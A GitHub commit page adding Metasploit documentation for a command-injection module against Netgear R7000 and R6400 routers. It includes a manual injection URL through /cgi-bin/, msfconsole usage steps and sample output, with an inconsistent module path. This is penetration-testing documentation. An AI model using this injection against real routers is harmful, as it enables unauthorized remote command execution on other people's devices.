Start docs
Carter
GitHub
parent
811f6d4d58
commit
d775c66adf
|
|
@ -0,0 +1,57 @@
|
||||||
|
The netgear_r7000_command_injection module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router.
|
||||||
|
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and possibly earlier.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do: `use exploit/linux/http/netgear_r7000_cgibin_exec`
|
||||||
|
3. Do: `set RHOST <RouterIP>`
|
||||||
|
4. Do: `set PAYLOAD <payload>
|
||||||
|
5. Do: `run`
|
||||||
|
6. If the router is a R7000 or R6400, the module should run
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**RHOST**
|
||||||
|
|
||||||
|
This should usually be the local IP address of the vulnerable router.
|
||||||
|
|
||||||
|
**PAYLOAD**
|
||||||
|
|
||||||
|
The valid payloads are `unix cmd` payloads _only_, as this is a command execution module
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
Sample output of what it should look like.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/netgear_r7000_command_injection
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > options
|
||||||
|
|
||||||
|
Module options (auxiliary/scanner/http/netgear_r7000_command_injection):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
CMD yes Command line to execute
|
||||||
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||||
|
RHOST yes The remote target address
|
||||||
|
RPORT 80 yes The target port
|
||||||
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||||
|
VHOST no HTTP server virtual host
|
||||||
|
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > set CMD echo "cowsay"
|
||||||
|
CMD => echo 'cowsay'
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > set RHOST 192.168.1.1
|
||||||
|
RHOST => 192.168.1.1
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > check
|
||||||
|
[*] 192.168.1.1:80 The target service is running, but could not be validated.
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) > run
|
||||||
|
|
||||||
|
[*] Sending request to 192.168.1.1
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(netgear_r7000_command_injection) >
|
||||||
|
```
|
||||||
Loading…
Reference in New Issue